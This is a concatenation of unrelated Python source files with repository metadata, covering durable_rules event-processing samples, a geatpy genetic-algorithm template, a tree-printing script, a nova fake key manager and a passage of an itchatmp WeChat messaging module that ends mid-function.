        host.assert_fact('strings', { 'subject': 'hello hi' })
        host.assert_fact('strings', { 'subject': 'has Hello string' })
        host.assert_fact('strings', { 'subject': 'does not match' })
# Correlated-expression sample: later conditions reference earlier captures.
with ruleset('risk0'):
    @when_all(c.first << m.amount > 10,
              c.second << m.amount > c.first.amount * 2,
              c.third << m.amount > c.first.amount + c.second.amount)
    def detected(c):
        print('fraud detected -> {0}'.format(c.first.amount))
        print('               -> {0}'.format(c.second.amount))
        print('               -> {0}'.format(c.third.amount))
    @when_start
    def start(host):
        host.post('risk0', { 'amount': 50 })
        host.post('risk0', { 'amount': 200 })
        host.post('risk0', { 'amount': 300 })
# when_any sample: either pair of events satisfies the rule.
with ruleset('expense1'):
    @when_any(all(c.first << m.subject == 'approve',
                  c.second << m.amount == 1000),
              all(c.third << m.subject == 'jumbo',
                  c.fourth << m.amount == 10000))
    def action(c):
        # only the matched branch's captures are populated
        if c.first:
            print ('Approved {0} {1}'.format(c.first.subject, c.second.amount))
        else:
            print ('Approved {0} {1}'.format(c.third.subject, c.fourth.amount))
    @when_start
    def start(host):
        host.post('expense1', { 'subject': 'approve' })
        host.post('expense1', { 'amount': 1000 })
        host.post('expense1', { 'subject': 'jumbo' })
        host.post('expense1', { 'amount': 10000 })
# Absence sample: 'none' requires that no matching event exists.
with ruleset('risk1'):
    @when_all(c.first << m.t == 'deposit',
              none(m.t == 'balance'),
              c.third << m.t == 'withrawal',
              c.fourth << m.t == 'chargeback')
    def detected(c):
        print('fraud detected {0} {1} {2}'.format(c.first.t, c.third.t, c.fourth.t))
    @when_start
    def start(host):
        host.post('risk1', { 't': 'deposit' })
        host.post('risk1', { 't': 'withrawal' })
        host.post('risk1', { 't': 'chargeback' })
# Priority sample: lower pri() values are evaluated first.
with ruleset('attributes'):
    @when_all(pri(3), m.amount < 300)
    def first_detect(c):
        print('attributes P3 ->{0}'.format(c.m.amount))
    @when_all(pri(2), m.amount < 200)
    def second_detect(c):
        print('attributes P2 ->{0}'.format(c.m.amount))
    @when_all(pri(1), m.amount < 100)
    def third_detect(c):
        print('attributes P1 ->{0}'.format(c.m.amount))
    @when_start
    def start(host):
        host.assert_fact('attributes', { 'amount': 50 })
        host.assert_fact('attributes', { 'amount': 150 })
        host.assert_fact('attributes', { 'amount': 250 })
# Batching sample: count() waits for N matches, cap() limits batch size.
with ruleset('expense2'):
    # this rule will trigger as soon as three events match the condition
    @when_all(count(3), m.amount < 100)
    def approve(c):
        print('approved {0}'.format(c.m))
    # this rule will be triggered when 'expense' is asserted batching at most two results
    @when_all(cap(2),
              c.expense << m.amount >= 100,
              c.approval << m.review == True)
    def reject(c):
        print('rejected {0}'.format(c.m))
    @when_start
    def start(host):
        host.post_batch('expense2', [{ 'amount': 10 },
                                     { 'amount': 20 },
                                     { 'amount': 100 },
                                     { 'amount': 30 },
                                     { 'amount': 200 },
                                     { 'amount': 400 }])
        host.assert_fact('expense2', { 'review': True })
# Async-action sample: actions receive a 'complete' callback for completion.
with ruleset('flow0'):
    timer = None
    # helper: run ``callback`` after ``time`` seconds on a daemon timer thread
    def start_timer(time, callback):
        timer = threading.Timer(time, callback)
        timer.daemon = True
        timer.start()
    @when_all(s.state == 'first')
    # async actions take a callback argument to signal completion
    def first(c, complete):
        def end_first():
            c.s.state = 'second'
            print('first completed')
            # completes the action after 3 seconds
            complete(None)
        start_timer(3, end_first)
    @when_all(s.state == 'second')
    def second(c, complete):
        def end_second():
            c.s.state = 'third'
            print('second completed')
            # completes the action after 6 seconds
            # use the first argument to signal an error
            complete(Exception('error detected'))
        start_timer(6, end_second)
        # overrides the 5 second default abandon timeout
        return 10
    @when_start
    def on_start(host):
        host.patch_state('flow0', { 'state': 'first' })
# Exception-handling sample: unhandled action errors surface on s.exception.
with ruleset('flow1'):
    @when_all(m.action == 'start')
    def first(c):
        raise Exception('Unhandled Exception!')
    # when the exception property exists
    @when_all(+s.exception)
    def second(c):
        print(c.s.exception)
        c.s.exception = None
    @when_start
    def on_start(host):
        host.post('flow1', { 'action': 'start' })
# Timer sample: a self-rescheduling pulse plus a cancel rule.
with ruleset('timer'):
    # will trigger when MyTimer expires
    @when_any(all(s.count == 0),
              all(s.count < 5,
                  timeout('MyTimer')))
    def pulse(c):
        c.s.count += 1
        # MyTimer will expire in 5 seconds
        c.start_timer('MyTimer', 5)
        print('pulse ->{0}'.format(datetime.datetime.now().strftime('%I:%M:%S%p')))
    @when_all(m.cancel == True)
    def cancel(c):
        c.cancel_timer('MyTimer')
        print('canceled timer')
    @when_start
    def on_start(host):
        host.patch_state('timer', { 'count': 0 })
# curl -H "content-type: application/json" -X POST -d '{"cancel": true}' http://localhost:5000/timer/events
# Timed statechart sample: three fast events mean fraud, otherwise time out.
with statechart('risk3'):
    with state('start'):
        @to('meter')
        def start(c):
            c.start_timer('RiskTimer', 5)
    with state('meter'):
        @to('fraud')
        @when_all(count(3), c.message << m.amount > 100)
        def fraud(c):
            for e in c.m:
                print(e.message)
        @to('exit')
        @when_all(timeout('RiskTimer'))
        def exit(c):
            print('exit')
    # terminal states
    state('fraud')
    state('exit')
    @when_start
    def on_start(host):
        # three events in a row will trigger the fraud rule
        host.post('risk3', { 'amount': 200 })
        host.post('risk3', { 'amount': 300 })
        host.post('risk3', { 'amount': 400 })
        # two events will exit after 5 seconds
        host.post('risk3', { 'sid': 1, 'amount': 500 })
        host.post('risk3', { 'sid': 1, 'amount': 600 })
# Event-velocity sample using a manual-reset timer window of 5 seconds.
with statechart('risk4'):
    with state('start'):
        @to('meter')
        def start(c):
            c.start_timer('VelocityTimer', 5, True)
    with state('meter'):
        @to('meter')
        @when_all(cap(5),
                  m.amount > 100,
                  timeout('VelocityTimer'))
        def some_events(c):
            print('velocity: {0} in 5 seconds'.format(len(c.m)))
            # resets and restarts the manual reset timer
            c.reset_timer('VelocityTimer')
            c.start_timer('VelocityTimer', 5, True)
        @to('meter')
        @when_all(pri(1), timeout('VelocityTimer'))
        def no_events(c):
            print('velocity: no events in 5 seconds')
            c.reset_timer('VelocityTimer')
            c.start_timer('VelocityTimer', 5, True)
    @when_start
    def on_start(host):
        # the velocity will be 4 events in 5 seconds
        host.post('risk4', { 'amount': 200 })
        host.post('risk4', { 'amount': 300 })
        host.post('risk4', { 'amount': 50 })
        host.post('risk4', { 'amount': 500 })
        host.post('risk4', { 'amount': 600 })
# curl -H "content-type: application/json" -X POST -d '{"amount": 200}' http://localhost:5000/risk4/events
# Multi-instance statechart sample: 'sid' routes events to separate instances.
with statechart('expense3'):
    # initial state 'input' with two triggers
    with state('input'):
        # trigger to move to 'denied' given a condition
        @to('denied')
        @when_all((m.subject == 'approve') & (m.amount > 1000))
        # action executed before state change
        def denied(c):
            print ('denied amount {0}'.format(c.m.amount))
        @to('pending')
        @when_all((m.subject == 'approve') & (m.amount <= 1000))
        def request(c):
            print ('requesting approve amount {0}'.format(c.m.amount))
    # intermediate state 'pending' with two triggers
    with state('pending'):
        @to('approved')
        @when_all(m.subject == 'approved')
        def approved(c):
            print ('expense approved')
        @to('denied')
        @when_all(m.subject == 'denied')
        def denied(c):
            print ('expense denied')
    # 'denied' and 'approved' are final states
    state('denied')
    state('approved')
    @when_start
    def on_start(host):
        # events directed to default statechart instance
        host.post('expense3', { 'subject': 'approve', 'amount': 100 });
        host.post('expense3', { 'subject': 'approved' });
        # events directed to statechart instance with id '1'
        host.post('expense3', { 'sid': 1, 'subject': 'approve', 'amount': 100 });
        host.post('expense3', { 'sid': 1, 'subject': 'denied' });
        # events directed to statechart instance with id '2'
        host.post('expense3', { 'sid': 2, 'subject': 'approve', 'amount': 10000 });
# Flowchart sample: stages with actions and transition conditions.
with flowchart('expense4'):
    # initial stage 'input' has two conditions
    with stage('input'):
        to('request').when_all((m.subject == 'approve') & (m.amount <= 1000))
        to('deny').when_all((m.subject == 'approve') & (m.amount > 1000))
    # intermediate stage 'request' has an action and three conditions
    with stage('request'):
        @run
        def request(c):
            print('requesting approve')
        to('approve').when_all(m.subject == 'approved')
        to('deny').when_all(m.subject == 'denied')
        # reflexive condition: if met, returns to the same stage
        to('request').when_all(m.subject == 'retry')
    with stage('approve'):
        @run
        def approved(c):
            print('expense approved')
    with stage('deny'):
        @run
        def denied(c):
            print('expense denied')
    @when_start
    def start(host):
        # events for the default flowchart instance, approved after retry
        host.post('expense4', { 'subject': 'approve', 'amount': 100 })
        host.post('expense4', { 'subject': 'retry' })
        host.post('expense4', { 'subject': 'approved' })
        # events for the flowchart instance '1', denied after first try
        host.post('expense4', { 'sid': 1, 'subject': 'approve', 'amount': 100})
        host.post('expense4', { 'sid': 1, 'subject': 'denied'})
        # event for the flowchart instance '2' immediately denied
        host.post('expense4', { 'sid': 2, 'subject': 'approve', 'amount': 10000})
# Statechart demonstrating a super-state: the 'cancel' trigger declared
# on 'work' is evaluated while the machine is in any of its sub-states.
with statechart('worker'):
    # super-state 'work' has two states and one trigger
    with state('work'):
        # sub-sate 'enter' has only one trigger
        with state('enter'):
            @to('process')
            @when_all(m.subject == 'enter')
            def continue_process(c):
                print('start process')
        with state('process'):
            @to('process')
            @when_all(m.subject == 'continue')
            def continue_process(c):
                print('continue processing')
        # the super-state trigger will be evaluated for all sub-state triggers
        @to('canceled')
        @when_all(m.subject == 'cancel')
        def cancel(c):
            print('cancel process')
    state('canceled')
    @when_start
    def start(host):
        # will move the statechart to the 'work.process' sub-state
        host.post('worker', { 'subject': 'enter' })
        # will keep the statechart to the 'work.process' sub-state
        host.post('worker', { 'subject': 'continue' })
        host.post('worker', { 'subject': 'continue' })
        # will move the statechart out of the work state
        host.post('worker', { 'subject': 'cancel' })
# Correlates two events: a bill and an account payment whose invoice
# amounts match.  The c.bill / c.account captures name the correlated
# events so the action can read both.
with ruleset('expense5'):
    @when_all(c.bill << (m.t == 'bill') & (m.invoice.amount > 50),
              c.account << (m.t == 'account') & (m.payment.invoice.amount == c.bill.invoice.amount))
    def approved(c):
        print ('bill amount ->{0}'.format(c.bill.invoice.amount))
        print ('account payment amount ->{0}'.format(c.account.payment.invoice.amount))
    @when_start
    def start(host):
        host.post('expense5', {'t': 'bill', 'invoice': {'amount': 100}})
        host.post('expense5', {'t': 'account', 'payment': {'invoice': {'amount': 100}}})
# Demonstrates facts vs events: asserting a fact, detecting a duplicate
# assert (return code 212), retracting a fact from inside an action, and
# matching plain events by their 'status' property.
with ruleset('bookstore'):
    # this rule will trigger for events with status
    @when_all(+m.status)
    def event(c):
        print('Reference {0} status {1}'.format(c.m.reference, c.m.status))
    @when_all(+m.name)
    def fact(c):
        print('Added {0}'.format(c.m.name))
        c.retract_fact({
            'name': 'The new book',
            'reference': '75323',
            'price': 500,
            'seller': 'bookstore'
        })
    # this rule will be triggered when the fact is retracted
    @when_all(none(+m.name))
    def empty(c):
        print('No books')
    @when_start
    def start(host):
        # will return 0 because the fact assert was successful
        print(host.assert_fact('bookstore', {
            'name': 'The new book',
            'seller': 'bookstore',
            'reference': '75323',
            'price': 500
        }))
        # will return 212 because the fact has already been asserted
        print(host.assert_fact('bookstore', {
            'reference': '75323',
            'name': 'The new book',
            'price': 500,
            'seller': 'bookstore'
        }))
        # will return 0 because a new event is being posted
        print(host.post('bookstore', {
            'reference': '75323',
            'status': 'Active'
        }))
        # will return 0 because a new event is being posted
        print(host.post('bookstore', {
            'reference': '75323',
            'status': 'Active'
        }))
# Fraud-detection rules: one expression comparing properties of a single
# event, and one correlating two events captured as c.first / c.second.
with ruleset('risk5'):
    # compares properties in the same event, this expression is evaluated in the client
    @when_all(m.debit > m.credit * 2)
    def fraud_1(c):
        print('debit {0} more than twice the credit {1}'.format(c.m.debit, c.m.credit))
    # compares two correlated events, this expression is evaluated in the backend
    @when_all(c.first << m.amount > 100,
              c.second << m.amount > c.first.amount + m.amount / 2)
    def fraud_2(c):
        print('fraud detected ->{0}'.format(c.first.amount))
        print('fraud detected ->{0}'.format(c.second.amount))
    @when_start
    def start(host):
        host.post('risk5', { 'debit': 220, 'credit': 100 })
        host.post('risk5', { 'debit': 150, 'credit': 100 })
        host.post('risk5', { 'amount': 200 })
        host.post('risk5', { 'amount': 500 })
# Array matching: allItems / anyItem quantifiers over primitive arrays,
# object arrays, string arrays (regex) and nested arrays.
with ruleset('risk6'):
    # matching primitive array
    @when_all(m.payments.allItems((item > 100) & (item < 400)))
    def rule1(c):
        print('should not match {0}'.format(c.m.payments))
    # matching primitive array
    @when_all(m.payments.allItems((item > 100) & (item < 500)))
    def rule1(c):
        print('fraud 1 detected {0}'.format(c.m.payments))
    # matching object array
    @when_all(m.payments.allItems((item.amount < 250) | (item.amount >= 300)))
    def rule2(c):
        print('fraud 2 detected {0}'.format(c.m.payments))
    # pattern matching string array
    @when_all(m.cards.anyItem(item.matches('three.*')))
    def rule3(c):
        print('fraud 3 detected {0}'.format(c.m.cards))
    # matching nested arrays
    @when_all(m.payments.anyItem(item.allItems(item < 100)))
    def rule4(c):
        print('fraud 4 detected {0}'.format(c.m.payments))
    @when_start
    def start(host):
        host.post('risk6', {'payments': [ 150, 300, 450 ]})
        host.post('risk6', {'payments': [ { 'amount' : 200 }, { 'amount' : 300 }, { 'amount' : 450 } ]})
        host.post('risk6', {'cards': [ 'one card', 'two cards', 'three cards' ]})
        host.post('risk6', {'payments': [ [ 10, 20, 30 ], [ 30, 40, 50 ], [ 10, 20 ] ]})
# with ruleset('flow'):
# @when_all(m.status == 'start')
# def start(c):
# c.post({ 'status': 'next' })
# print('start')
# # the process will always exit here every time the action is run
# # when restarting the process this action will be retried after a few seconds
# @when_all(m.status == 'next')
# def next(c):
# c.post({ 'status': 'last' })
# print('next')
# os._exit(1)
# @when_all(m.status == 'last')
# def last(c):
# print('last')
# @when_start
# def on_start(host):
# host.post('flow', { 'status': 'start' })
# Start the durable-rules host: runs every registered ruleset /
# statechart / flowchart and fires their @when_start handlers (blocks).
run_all()
| [
"jr3791@live.com"
] | jr3791@live.com |
2ba794c5fbdf6b165029c3b20b7d4ae08486b115 | 4fd77ce692e10e962483c7e3e6e76c44887e9f52 | /geatpy/templates/soeas/GA/studGA/soea_psy_studGA_templet.py | 7cb191a9338b905bc256f6ecb2c43a2de4b72a72 | [
"MIT"
] | permissive | Passion-long/geatpy | d1aaf1622058473649840a9e2e26f9d0b0844bce | 8e2ab8730babaae640272bd4c77106519bdd120c | refs/heads/master | 2020-07-09T13:40:36.217907 | 2019-08-23T03:36:12 | 2019-08-23T03:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,750 | py | # -*- coding: utf-8 -*-
import numpy as np
import geatpy as ea # 导入geatpy库
from sys import path as paths
from os import path
paths.append(path.split(path.split(path.realpath(__file__))[0])[0])
class soea_psy_studGA_templet(ea.SoeaAlgorithm):
    """
    soea_psy_studGA_templet - Polysomy Stud GA templet (multi-chromosome stud GA template)

    Template description:
        This is the multi-chromosome version of the built-in template
        soea_studGA_templet: the population object it operates on is an
        instance of PsyPopulation, the multi-chromosome population class
        that supports mixed encodings.

    Algorithm description:
        Implements the stud GA; see reference [1] for the full flow.

    Usage notes:
        The objective function called by this template has the form
        aimFunc(pop), where pop is a population object.  pop.Phen (the
        phenotype matrix) is the matrix of all individuals' decision
        variables; aimFunc computes the objective values from it and
        assigns them to pop.ObjV, and, when there are constraints,
        assigns the constraint-violation matrix to pop.CV (see the
        Geatpy data-structure docs).  aimFunc returns nothing: after
        calling aimFunc(population), results are read from
        population.ObjV and population.CV.  If your objective function
        does not follow this convention, adapt this template or write
        a new one.

    Reference:
        [1] Khatib W , Fleming P J . The stud GA: A mini revolution?[C]// International
        Conference on Parallel Problem Solving from Nature. Springer, Berlin, Heidelberg, 1998.
    """
    def __init__(self, problem, population):
        ea.SoeaAlgorithm.__init__(self, problem, population) # call the parent-class constructor first
        # NOTE(review): string-based type check is fragile; isinstance
        # against the PsyPopulation class would be safer -- confirm why
        # the string form was chosen before changing it.
        if str(type(population)) != "<class 'PsyPopulation.PsyPopulation'>":
            raise RuntimeError('传入的种群对象必须为PsyPopulation类型')
        self.name = 'psy-studGA'
        self.problem = problem
        self.population = population
        self.selFunc = 'tour' # tournament selection operator
        # With several chromosomes per individual we need one recombination
        # operator and one mutation operator per chromosome, and hence one
        # recombination/mutation probability per chromosome as well.
        self.recFuncs = []
        self.mutFuncs = []
        self.pcs = []
        self.pms = []
        for i in range(population.ChromNum):
            if population.Encodings[i] == 'P':
                self.recFuncs.append('xovpmx') # partially matched crossover (PMX)
                self.mutFuncs.append('mutinv') # inversion mutation (reverses a chromosome segment)
            else:
                self.recFuncs.append('xovdp') # two-point crossover
                if population.Encodings[i] == 'BG':
                    self.mutFuncs.append('mutbin') # binary mutation
                elif population.Encodings[i] == 'RI':
                    self.mutFuncs.append('mutbga') # mutation operator from the breeder GA
                else:
                    raise RuntimeError('编码方式必须为''BG''、''RI''或''P''.')
            self.pcs.append(1) # recombination probability
            self.pms.append(1) # mutation probability for the whole chromosome
    def run(self):
        #========================== initialization ===========================
        population = self.population
        NIND = population.sizes
        self.initialization() # initialize the template's dynamic parameters
        #======================== prepare for evolution ======================
        population.initChrom(NIND) # initialize the chromosome matrices (includes decoding; see the PsyPopulation source)
        self.problem.aimFunc(population) # evaluate the population's objective values
        population.FitnV = ea.scaling(self.problem.maxormins * population.ObjV, population.CV) # compute fitness
        self.evalsNum = population.sizes # record the number of evaluations
        #============================= evolve ================================
        while self.terminated(population) == False:
            bestIdx = np.argmax(population.FitnV, axis = 0) # index of the current best individual (axis=0 yields a vector)
            studPop = population[np.tile(bestIdx, (NIND//2))] # replicate the best individual NIND//2 times to form the "stud" population
            restPop = population[np.where(np.array(range(NIND)) != bestIdx)[0]] # every individual except the elite
            # Select mates for the stud population from the remaining individuals.
            tempPop = restPop[ea.selecting(self.selFunc, restPop.FitnV, (NIND - studPop.sizes))]
            # Merge the stud population with the selected individuals.
            population = studPop + tempPop
            # Evolutionary operators: recombine and mutate each chromosome
            # according to its own encoding.
            for i in range(population.ChromNum):
                population.Chroms[i] = ea.recombin(self.recFuncs[i], population.Chroms[i], self.pcs[i]) # recombination
                population.Chroms[i] = ea.mutate(self.mutFuncs[i], population.Encodings[i], population.Chroms[i], population.Fields[i], self.pms[i]) # mutation
            # Evaluate the evolved individuals.
            population.Phen = population.decoding() # decode chromosomes into phenotypes
            self.problem.aimFunc(population)
            self.evalsNum += population.sizes # update the evaluation count
            population.FitnV = ea.scaling(self.problem.maxormins * population.ObjV, population.CV) # compute fitness
        return self.finishing(population) # finish up and return the results
| [
"jazzbin@geatpy.com"
] | jazzbin@geatpy.com |
07e725cccf87298783a7e6d7e42e718a7298fd4a | 65ed194a0b1f7eed060a669fe58cd216ac0eb2f1 | /q2.py | 56bac1056893723ac54742e54a570196be02c753 | [] | no_license | julia-zhao/for-synqrinus | b501e84d4a8102df185fa2b7b6b128fd04491a58 | fd278391c2b8d69302b2514821d5229f45ba8375 | refs/heads/master | 2021-01-01T07:22:39.749516 | 2020-02-17T15:56:33 | 2020-02-17T15:56:33 | 239,168,609 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,871 | py | class Node:
    def __init__ (self, data):
        """Tree node holding a label (data) and an ordered list of children."""
        self.data = data
        self.children = [] # list of child Nodes (the original "dict" note was inaccurate)
    def insert(self, parent, data):
        """Insert data as a child of the node labelled parent.

        When this node is not the parent, recurse into the most recently
        added child -- assumes insertions arrive in construction order.
        """
        if (self.data == parent):
            self.children.append(Node(data))
        else:
            #insert a child node into the last child
            self.children[-1].insert(parent, data)
    def level(self, data, level):
        """Return the depth of the node labelled data, counting from level
        (the depth of self).  Relies on children being in sorted order.
        """
        if (self.data == data):
            return level
        #find the two children nodes that data falls between
        i = 0
        for node in self.children:
            #operating under the assumption that the inputs are in order (not random)
            if (node.data > data):
                i-=1
                break
            elif (node.data == data): #found the data within the children of current node
                return level + 1
            else:
                i+=1
        next_level = self.children[i].level(data, level+1)
        return next_level
    def print_out(self, level, num_chars, root):
        """Print the subtree rooted here with box-drawing connectors.

        WARNING: destructive traversal -- each child is popped from
        self.children after it is printed, so the tree is consumed.
        root is the tree's root Node, used to rebuild connector prefixes.
        """
        print(self.data)
        level = self.level(self.data,level+1)
        while self.children: #children is not empty
            if (level > 1):
                # prefix of spaces / vertical bars leading to this depth
                s = root.make_string("",self.data)
                print (s, end = '')
            if (level > 0):
                print (u'\u2514', end = '') #check for └ (U+2514)
            self.children[0].print_out(level, num_chars + 1, root)
            self.children.pop(0) #remove this child once you have traversed through it
    def right_check(self, data): #Check that all levels only have one children left
        # NOTE(review): the recursive call's result is discarded, so this
        # returns None (not True/False) whenever it recurses -- the method
        # is unused in this file; confirm intent before relying on it.
        if (len(self.children) > 1):
            return False
        elif (self.children):
            self.children[0].right_check(data)
        else:
            return True
    def make_string(self, s, data):
        """Build the connector prefix (spaces and │ bars) for the line on
        which the node labelled data is printed, walking down from self.
        """
        if (len(self.children) > 1):
            s += u'\u2502'   # │ : more siblings remain below at this depth
        else:
            s += ' '
        #Check if data is found in one of the children nodes
        for node in self.children:
            if (node.data==data):
                return s
        if (self.data == data):
            return s
        #find the two children nodes that data falls between
        i = 0
        if (len(self.children) > 1):
            for node in self.children:
                #operating under the assumption that the inputs are in order (not random)
                if (node.data > data):
                    i-=1
                    break
                else:
                    i+=1
        s = self.children[i].make_string(s, data)
        return s
#end of class
def main():
    """Read the tree description from test.txt and print it.

    Each line has the form ["child" "parent"]; a parent of 'nil' marks
    the root.  Lines are assumed to arrive in insertion order.
    """
    root = 0
    #loop until end of file
    with open('test.txt') as test_file:
        for line in test_file:
            data = line.strip('][ \n') #get only the data
            # split into ("child", "parent") after dropping the quotes
            data = tuple([i for i in data.replace("\"", "").split(" ")])
            if (data[1] == 'nil'):
                root = Node(data[0])
            else:
                root.insert(data[1], data[0])
    root.print_out(0, 0, root)
if __name__== "__main__":
    main()
#Case 1
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('C', 'D')
#Case 2
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('B', 'D')
# root.insert('A', 'E')
#Case 3
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('B', 'D')
# root.insert('D', 'E')
# root.insert('B', 'F')
# root.insert('A', 'G')
# root.insert('G', 'H')
#Case 4
# root = Node('A')
# root.insert('A', 'B')
# root.insert('B', 'C')
# root.insert('C', 'D')
# root.insert('D', 'E')
# root.insert('E', 'F')
# root.insert('C', 'G')
# root.insert('A', 'H')
# root.insert('H', 'I')
# root.insert('I', 'J')
# root.insert('H', 'K')
# root.insert('K', 'L')
# level = root.level('E', 0)
# print ("level is: " + str(level))
#root.print_out(0, 0, root) | [
"zhj.julia@gmail.com"
] | zhj.julia@gmail.com |
545aac01abbebdbef94ce6fc238f142f7cc74f19 | c27c51f5c33e0431dbe7db6e18c21b249d476cfa | /OpenSource_Python_Code/nova-2013.2/nova/tests/keymgr/fake.py | 85e62e3dcf9076b4adb4dd85da8723f0fe4f1411 | [
"Apache-2.0"
] | permissive | bopopescu/Python_Stuff | 9bef74e0db17bb5e3ba2d908ced01ee744820d80 | 9aa94a0fa5e4e802090c7b29ec88b840e304d9e5 | refs/heads/master | 2022-11-20T06:54:36.581623 | 2017-12-04T18:56:02 | 2017-12-04T18:56:02 | 282,171,169 | 0 | 0 | null | 2020-07-24T08:54:37 | 2020-07-24T08:54:36 | null | UTF-8 | Python | false | false | 854 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Justin Santa Barbara
# Copyright 2012 OpenStack LLC
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of a fake key manager."""
from nova.keymgr import mock_key_mgr
def fake_api():
    """Return the fake key-manager implementation (a new MockKeyManager)."""
    return mock_key_mgr.MockKeyManager()
| [
"thelma1944@gmail.com"
] | thelma1944@gmail.com |
84c1b24826b45edc4f25012eca81cc7fc385ed02 | 36fce47d77e6a66ec68b1c93451ff25f46b6b356 | /luogu/SequentialStructure/P5709.py | 869d51d850389b5e776ab9db1e7422b747afe6cd | [] | no_license | Brvc3/algorithms | b474962f44d8bf4b3b1281247c2ffc81b91cdbe7 | 554acfb512f1fe7c9aae27e9b044786ea69e861c | refs/heads/main | 2023-07-20T20:42:04.500192 | 2021-09-01T08:32:54 | 2021-09-01T08:32:54 | 401,984,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 122 | py | m,t,s = list(map(float,input().rstrip().split()))
# t == 0 means no time is needed per apple: print 0 and stop early
# (this also avoids the division by zero below).
if t==0:
    print(0)
    exit(0)
# apples left after s minutes when one apple takes t minutes to eat
left = int(m - s/t)
print(max(0,left)) | [
"brvc3@jnsec.org"
] | brvc3@jnsec.org |
670bf7861c66ba3262b153253670f01ea97f1060 | c50e267978e01b54afdba75f6a98ad114aaa1c80 | /reedima/articles/migrations/0003_auto_20191226_1203.py | 90bdabe9ecb48629c53afde6f4da3ce1d6da2c48 | [] | no_license | Dilshan1997/reedima-1 | f89309d384419b64249e7b0bb6b314eb7e09f695 | 02fd67a07427693ca0f8770c0bbc18b997810adc | refs/heads/master | 2022-06-20T00:18:06.954607 | 2020-05-11T14:58:19 | 2020-05-11T14:58:19 | 263,064,023 | 1 | 0 | null | 2020-05-11T14:20:03 | 2020-05-11T14:20:02 | null | UTF-8 | Python | false | false | 439 | py | # Generated by Django 3.0.1 on 2019-12-26 06:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articles', '0002_auto_20191226_1138'),
]
operations = [
migrations.AlterField(
model_name='post',
name='id',
field=models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
| [
"shane.thiwanka@gmail.com"
] | shane.thiwanka@gmail.com |
9c1df693b065f41ae2067d039224caed2c72d384 | cd26498ce1a963fc12607e3c2e5f26d738a6d52c | /queryTaolun/urls.py | e261a7e4b3ff349d53f68eaece80d5c6a49541f6 | [] | no_license | DaneWang9513/Wx_miniprogram_server | de2bea44d94e35065102be736b59e654484ba4a4 | e15747ea567cdd7cc11b2777672fd388237ab2f7 | refs/heads/master | 2021-02-27T10:13:07.640295 | 2020-03-07T09:49:58 | 2020-03-07T09:49:58 | 245,598,532 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | from django.conf.urls import url,include
from . import views
# Route table for the queryTaolun app: each pattern dispatches to the
# matching view function in views.py.
# NOTE(review): the regexes are unanchored (no ^ or $), so they match
# these substrings anywhere in the requested path -- confirm intended.
urlpatterns = [
    url(r'getTaolun',views.getTaolun),
    url(r'Taolun_detail',views.Taolun_detail)
] | [
"danewang9513@gmail.com"
] | danewang9513@gmail.com |
848356b8842293f30d58db6ccfc7eb592c6638f8 | 7ba131dadd14574d0dc463eac483b48e505d9a67 | /itchatmp/controllers/mpapi/mp/messages.py | 23161a6eb430de2c24c5073f8d647048adbe49da | [
"MIT"
] | permissive | sysuzyq/itchatmp | a40e615016c43c12c989a0a0257069ead042464c | be235d023b6a55123706d56cd0d149e4271b2c0c | refs/heads/master | 2021-01-19T23:59:34.792413 | 2017-03-15T06:54:52 | 2017-03-15T06:54:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,458 | py | ''' This package is for mass texting in wechat mp
1. What can we send?
- IMAGE, VOICE, VIDEO, TEXT, NEWS, CARD
2. How to send them?
- we use send_some / send_all method
`send_some(targetIdList, msgType, mediaId, additionalDict)`
- for msg like text and card, just pass content as msgId
- for files like image, voice, video, we need to upload them first
`upload(fileType, openedFile, additionalDict, permanent)`
- for news, you need to form them first and upload to get msgId
`create_news(newsDict, permanent)`
for images used in news, you need to turn them into url first
`get_image_url(openedFile)`
- SPECIAL WARNING: video is a little bit **STRANGE**
when uploading or sending, you need to pass additionalDict to method
`{"title" :VIDEO_TITLE, "introduction" :INTRODUCTION}`
    3. I also listed the API list for you:
- SENDING
send_some
send_all
preview
- MSG MANAGING
delete
get
- TEMP MATERIAL MANAGING
upload
download
        - PERMANENT MATERIAL MANAGING
get_material
delete_material
get_materialcount
batchget_material
- FORM NEWS
create_news
update_news
get_image_url
'''
import logging, json, os, mimetypes, io, re
from ..requests import requests
from .common import access_token
from itchatmp.utils import retry, encode_send_dict
from itchatmp.config import SERVER_URL
from itchatmp.content import (
IMAGE, VOICE, VIDEO, THUMB, TEXT, NEWS, CARD)
from itchatmp.returnvalues import ReturnValue
logger = logging.getLogger('itchatmp')
@access_token
def send_some(msgType, mediaId, additionalDict={},
        targetIdList=[], partyIdList=[], tagIdList=[],
        agentId=None, accessToken=None):
    ''' mass-send a message to a specific list of users (mass/send)
     * msgType: one of IMAGE/VOICE/VIDEO/TEXT/NEWS/CARD
     * mediaId: media id for file types, or the literal content for
       TEXT/CARD (see __form_send_dict)
     * targetIdList: plain list of at least two user ids, otherwise
       errcode 40130 is returned without calling the server
     * partyIdList / tagIdList / agentId are accepted but not used in
       this function -- NOTE(review): confirm why they are kept
     * accessToken is injected by the @access_token decorator
     * returns the request object with a _wrap_result hook that turns
       the response into a ReturnValue (presumably consumed by the
       project's requests wrapper -- confirm)
    '''
    msgDict = __form_send_dict(msgType, mediaId, additionalDict)
    if not msgDict: return msgDict
    if not isinstance(targetIdList, list) or len(targetIdList) < 2:
        return ReturnValue({'errcode': 40130})
    msgDict['touser'] = targetIdList
    r = requests.post('%s/cgi-bin/message/mass/send?access_token=%s' %
